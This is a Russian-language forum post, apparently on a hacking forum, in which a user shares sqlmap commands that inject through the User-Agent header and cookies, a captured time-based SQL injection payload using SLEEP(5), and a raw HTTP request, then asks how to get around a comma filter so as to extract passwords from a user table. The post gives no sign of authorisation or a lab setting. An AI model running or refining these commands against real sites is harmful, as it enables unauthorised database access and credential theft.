Сообщение от
lifescore
lifescore said:
./sqlmap.py --headers="
User-Agent: Mozilla/5.0 Gecko/20120101 Firefox/26.0
" --cookie="
%Query_Cookie%
" -u '
http://url.com/path/?id=1
' --level=5 risk=3 -p
%Parametr%
Или
-r
и путь к файлу с HTTP запросом
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]POST[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]vuln[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php HTTP[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1.1
Host[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]target[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]com
User[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Agent[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Mozilla[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]4.0
id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][/COLOR]
Способ на первый взгляд сработал, вектор запросов найден, timebased SQL, я дошёл до финальной стадии когда SQLmap предлагает ввести произвольный SQL запрос и выполнить его, однако он не выполняется, на любой запрос выводит none
Пробую способ:
./sqlmap.py --headers="User-Agent: Mozilla/5.0 Gecko/20120101 *" -u "http://url.com/path/?id=1" --level=5 risk=3 --dbms="MySQL"
Вектор атаки найден:
Payload: User-Agent: Mozilla/5.0 Gecko/20120101') AND SLEEP(5)#
Однако, в SQL иньекции фильтруются запятые, а так как я не силен в timebased векторах, то даже предположить не могу, возможно ли провести timebased атаку без запятых и выполнить грубо говоря запрос select password from user
После найденного вектора запускаю скрипт:
./sqlmap.py --headers="User-Agent: Mozilla/5.0 Gecko/20120101 *" -u "http://url.com/path/?id=1" --level=5 risk=3 --dbms="MySQL" --sql-query="SELECT user()"
Он ждет минут 5-10 в retrieved:, пытается выполнить запрос и вытащить ответ, и по истечению времени вываливает:
SELECT user(): None
И так на любой SQL запрос. И вот вопрос, это из за запятых невозможно провести атаку, или я что то не так делаю? Подскажите пожалуйста!